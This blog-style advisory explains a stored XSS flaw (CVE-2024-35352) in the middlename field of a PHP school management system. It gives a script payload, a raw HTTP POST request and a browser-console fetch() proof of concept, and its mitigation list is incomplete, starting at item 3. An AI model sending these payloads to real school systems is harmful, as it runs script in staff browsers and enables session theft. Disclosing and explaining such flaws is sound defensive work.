CVE-2024-35352 - XSS Vulnerability in Diño Physics School Assistant 2.3 Exploited

A new vulnerability, CVE-2024-35352, has been discovered in the Diño Physics School Assistant version 2.3. This post will explain—using simple language—what the vulnerability is, why it matters, and how it can be exploited, along with code examples. If you use this software in a school, pay close attention!

What is Diño Physics School Assistant?

Diño Physics School Assistant is a free PHP/MySQL-based school management system, often used in schools for managing students, teachers, schedules, and grades.

Affected File

/classes/Users.php?f=save

Affected Parameter

middlename

Version

2.3 (and possibly earlier versions)

Impact

A user entering special JavaScript code via the middlename field can make the site run malicious scripts in other users’ browsers. This can be used to steal sessions, redirect users, or worse.

How Does the Vulnerability Work?

The PHP script responsible for saving user information (Users.php?f=save) does not sanitize inputs for the "middlename" field.

So, if someone inputs JavaScript code as their middlename, and a page later displays this without escaping, the code will execute in the browser of anyone viewing that page.

Here’s a simple script that could be inserted as a middlename

<script>alert('Hacked!')</script>

You can use Burp Suite, browser dev tools, or curl to send a request like this

POST /classes/Users.php?f=save HTTP/1.1
Host: targetschool.example.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=YOURSESSIONID

id=123&middlename=%3Cscript%3Ealert('Hacked!')%3C%2Fscript%3E&firstname=John&lastname=Doe

*Here, %3Cscript%3Ealert('Hacked!')%3C%2Fscript%3E is the URL-encoded form for <script>alert('Hacked!')</script>.*

Later, when an admin or teacher views the user list or profile, the script executes in their browser

<span>Middlename: <script>alert('Hacked!')</script></span>

![](https://i.imgur.com/7tRhydp.png)

Proof-of-Concept HTML Code

Here’s a JavaScript snippet you can run in your browser console to send an exploit (make sure you have permission!):

fetch('/classes/Users.php?f=save', {
  method: 'POST',
  credentials: 'include',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  body: 'id=123&middlename=%3Cscript%3Ealert("Gotcha!")%3C%2Fscript%3E'
})
.then(res => console.log('Payload sent!'));

References

- NVD Listing for CVE-2024-35352 *(Details as available)*
- Original Project on SourceForge
- OWASP XSS Overview

Use Content Security Policy (CSP): Prevent execution of inline scripts.

3. Update ASAP: Check the project page for patches.

Conclusion

CVE-2024-35352 is a simple but dangerous XSS vulnerability in Diño Physics School Assistant’s user saving code. If you use this software, patch it and sanitize all user inputs. Don't let someone sneak JavaScript into your school system—protect your community!

Stay safe and secure—always validate and escape your inputs.

*If you want more technical breakdowns, follow OWASP XSS guidelines.*

Timeline

Published on: 05/30/2024 17:15:33 UTC
Last modified on: 07/03/2024 02:01:35 UTC